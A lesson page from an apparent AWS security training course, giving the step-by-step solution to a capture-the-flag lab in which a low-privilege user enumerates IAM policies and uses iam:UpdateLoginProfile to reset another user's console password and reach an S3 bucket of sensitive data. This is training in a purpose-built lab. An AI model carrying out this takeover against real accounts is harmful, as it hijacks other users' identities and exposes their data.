Back to Course

AWS IAM Privilege Escalation Labs

0% Complete
0/0 Steps
  1. Introduction

    About this course
  2. Real-world case studies
  3. Useful IAM tips and security tools
  4. Introduction to AWS Enumeration
    [LAB] Getting Started with the AWS CLI
  5. [LAB] Introduction to AWS IAM Enumeration
  6. [Cheat Sheet] IAM Enumeration CLI Commands
  7. [LAB] Introduction to Secrets Manager Enumeration
  8. [Cheat Sheet] Secrets Manager Enumeration CLI Commands
  9. [LAB] Introduction to Amazon S3 Enumeration
  10. iam:CreateAccessKey
    [LAB] [CTF] iam:CreateAccessKey PrivEsc
  11. iam:CreateAccessKey Solution
  12. iam:CreateLoginProfile
    [LAB] [CTF] iam:CreateLoginProfile PrivEsc
  13. iam:CreateLoginProfile Solution
  14. iam:UpdateLoginProfile
    [LAB] [CTF] iam:UpdateLoginProfile PrivEsc
  15. iam:UpdateLoginProfile Solution
  16. iam:SetDefaultPolicyVersion
    [LAB] [CTF] iam:SetDefaultPolicyVersion PrivEsc
  17. iam:SetDefaultPolicyVersion Solution
  18. iam:AddUserToGroup
    [LAB] [CTF] iam:AddUserToGroup PrivEsc
  19. iam:AddUserToGroup Solution
  20. iam:AttachUserPolicy
    [LAB] [CTF] iam:AttachUserPolicy PrivEsc
  21. iam:AttachUserPolicy Solution
  22. iam:AttachGroupPolicy
    [LAB] [CTF] iam:AttachGroupPolicy PrivEsc
  23. iam:AttachGroupPolicy Solution
  24. iam:PutUserPolicy
    [LAB] [CTF] iam:PutUserPolicy PrivEsc
  25. iam:PutUserPolicy Solution
  26. iam:PutGroupPolicy
    [LAB] [CTF] iam:PutGroupPolicy PrivEsc
  27. iam:PutGroupPolicy Solution
  28. iam:AttachRolePolicy
    [LAB] [CTF] iam:AttachRolePolicy PrivEsc
  29. iam:AttachRolePolicy Solution
  30. iam:PutRolePolicy
    [LAB] [CTF] iam:PutRolePolicy PrivEsc
  31. iam:PutRolePolicy Solution
  32. Challenges
    About challenges
  33. Challenge #1 - Secrets Unleashed
  34. Challenge #2 - IAM Escape Room
  35. Conclusion
    What did you think of the course?
  36. What's next?
Lesson 15 of 36
In Progress

iam:UpdateLoginProfile Solution

Christophe November 19, 2023

Using the provided Access Key ID and Secret Access Key, configure your AWS CLI profile.

aws configure --profile updatelogin

Enumerate your user’s permissions:

aws iam list-groups --profile updatelogin
Code language: PHP (php)
{
    "Groups": [
        {
            "Path": "/",
            "GroupName": "iam-updateloginprofile-privesc-1701726668596-Developers",
            "GroupId": "AGPA5M7PA4Z555SJEHAYD",
            "Arn": "arn:aws:iam::921234892411:group/iam-updateloginprofile-privesc-1701726668596-Developers",
            "CreateDate": "2023-12-04T21:51:37+00:00"
        }
    ]
}

Code language: JSON / JSON with Comments (json)

List policies for this group:

aws iam list-group-policies --group-name iam-updateloginprofile-privesc-1701726668596-Developers --profile updatelogin

Code language: PHP (php)
{
    "PolicyNames": [
        "iam-updateloginprofile-privesc-1701726668596-policy"
    ]
}
Code language: JSON / JSON with Comments (json)

Now list the permissions in this policy:

aws iam get-group-policy --group-name iam-updateloginprofile-privesc-1701726668596-Developers --policy-name iam-updateloginprofile-privesc-1701726668596-policy --profile updatelogin

Code language: JavaScript (javascript)
{
    "GroupName": "iam-updateloginprofile-privesc-1701726668596-Developers",
    "PolicyName": "iam-updateloginprofile-privesc-1701726668596-policy",
    "PolicyDocument": {
        "Version": "2012-10-17",
        "Statement": [
            {
                "Action": [
                    "iam:UpdateLoginProfile",
                    "iam:ListAccessKeys",
                    "iam:ListAttachedUserPolicies"
                ],
                "Resource": [
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Bob"
                ],
                "Effect": "Allow"
            },
            {
                "Action": [
                    "iam:ListGroupPolicies",
                    "iam:ListPolicies",
                    "iam:ListPolicyVersions",
                    "iam:ListUserPolicies",
                    "iam:ListUsers",
                    "iam:ListGroups",
                    "iam:ListGroupsForUser",
                    "iam:GetPolicy",
                    "iam:GetPolicyVersion",
                    "iam:GetRole",
                    "iam:GetRolePolicy",
                    "iam:GetUser",
                    "iam:GetUserPolicy",
                    "iam:GetGroupPolicy"
                ],
                "Resource": "*",
                "Effect": "Allow"
            },
            {
                "Action": [
                    "s3:ListBucket"
                ],
                "Resource": "arn:aws:s3:::cybr-sensitive-data-bucket-921234892411",
                "Effect": "Allow"
            },
            {
                "Action": [
                    "s3:GetObject"
                ],
                "Resource": "arn:aws:s3:::cybr-sensitive-data-bucket-921234892411/*",
                "Effect": "Allow"
            },
            {
                "Action": [
                    "s3:ListAllMyBuckets",
                    "s3:GetBucketLocation"
                ],
                "Resource": "*",
                "Effect": "Allow"
            },
            {
                "Action": [
                    "iam:UpdateLoginProfile"
                ],
                "Resource": [
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Alice"
                ],
                "Effect": "Deny"
            }
        ]
    }
}

Code language: JSON / JSON with Comments (json)

By viewing your policy, you get quite a bit of information back. Including that you are able to list users in this account:

aws iam list-users --profile updatelogin

Code language: PHP (php)
{
    "Users": [
        {
            "Path": "/",
            "UserName": "iam-updateloginprofile-privesc-1701726668596-Alice",
            "UserId": "AIDA5M7PA4Z5VBTREZO3L",
            "Arn": "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Alice",
            "CreateDate": "2023-12-04T21:51:37+00:00"
        },
        {
            "Path": "/",
            "UserName": "iam-updateloginprofile-privesc-1701726668596-Attacker",
            "UserId": "AIDA5M7PA4Z5TE63N6QMD",
            "Arn": "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
            "CreateDate": "2023-12-04T21:51:14+00:00"
        },
        {
            "Path": "/",
            "UserName": "iam-updateloginprofile-privesc-1701726668596-Bob",
            "UserId": "AIDA5M7PA4Z5SGDBSVMK6",
            "Arn": "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Bob",
            "CreateDate": "2023-12-04T21:51:37+00:00"
        },
        {
            "Path": "/",
            "UserName": "iam-updateloginprofile-privesc-1701726668596-Mark",
            "UserId": "AIDA5M7PA4Z57CYAWOOIP",
            "Arn": "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
            "CreateDate": "2023-12-04T21:51:37+00:00"
        }
    ]
}

Code language: JSON / JSON with Comments (json)

This result shows us that there are multiple IAM users:

  • Alice
  • Bob
  • Mark

Which one should we attack?

Well, if we look at the IAM policy attached to our group, we have:

{
                "Action": [
                    "iam:UpdateLoginProfile",
                    "iam:ListAccessKeys",
                    "iam:ListAttachedUserPolicies"
                ],
                "Resource": [
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Bob"
                ],
                "Effect": "Allow"
            },

Code language: JavaScript (javascript)

But then we have an explicit deny:

{
                "Action": [
                    "iam:UpdateLoginProfile"
                ],
                "Resource": [
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Attacker",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Mark",
                    "arn:aws:iam::921234892411:user/iam-updateloginprofile-privesc-1701726668596-Alice"
                ],
                "Effect": "Deny"
            }

Code language: JSON / JSON with Comments (json)

That means we cannot UpdateLoginProfile on Mark or Alice, it has to be Bob.

aws iam update-login-profile --user-name iam-updateloginprofile-privesc-1701727836920-Bob --password 'JzreMu8KXF9RvTpb2sSRJqyd5uioMi' --no-password-reset-required --profile updatelogin

Code language: JavaScript (javascript)

We can now use the username, AWS account ID, and the password we provided, in order to log into the AWS console:

https://signin.aws.amazon.com/signin

Once logged in (sometimes it can be finicky), make sure you change to “N. Virginia” as the region. It might default to something else.

From there, you can access Amazon S3 to find a bucket containing sensitive data that you can then download. Submit the flag by copy/pasting Joshua Lee’s credit card number.

Responses

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.